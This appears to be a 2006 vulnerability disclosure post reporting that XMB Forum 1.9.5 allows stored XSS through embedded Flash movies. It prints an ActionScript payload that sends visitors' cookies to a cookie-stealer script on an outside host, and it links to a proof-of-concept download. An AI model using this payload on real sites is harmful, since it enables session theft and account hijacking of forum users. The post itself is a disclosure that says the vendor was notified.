Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Vulnerabilities in SPIP

interaktiv.shop v.5 XSS vuln.

MyBB 1.10 'newthread. php' < CrossSiteScripting >

[SA19578] MAXdev MD-Pro "topicid" SQL Injection Vulnerability

From:	r0xes.ratm_(at)_gmail.com <r0xes.ratm_(at)_gmail.com>
Date:	10.04.2006
Subject:	XMB Forum 1.9.5-Final XSS

XMB Forum 1.9.5 (I have not tested this on earlier versions)
allows users to embed flash (.swf) videos in their posts.
Normally, you could set an option on the <object> tag to say that ActionScript cannot run, but in this case we don't.

The way we execute our code is by making a flash movie containing the Actionscript code:
getURL("javascript:document.location='class="fixed">http://my-site.com/path/to/cookiestealer.php?cookie='+document.
cookie;");

An example video + .fla script can be downloaded at my site: http://dynxss.whiteacid.org/videos/xmbforum_1.9.5-final.rar

XMB has been notified, expect this to be fixed in a few days.

comments, questions, flames, etc.
r0xes [dot] ratm [at] gmail [dot] com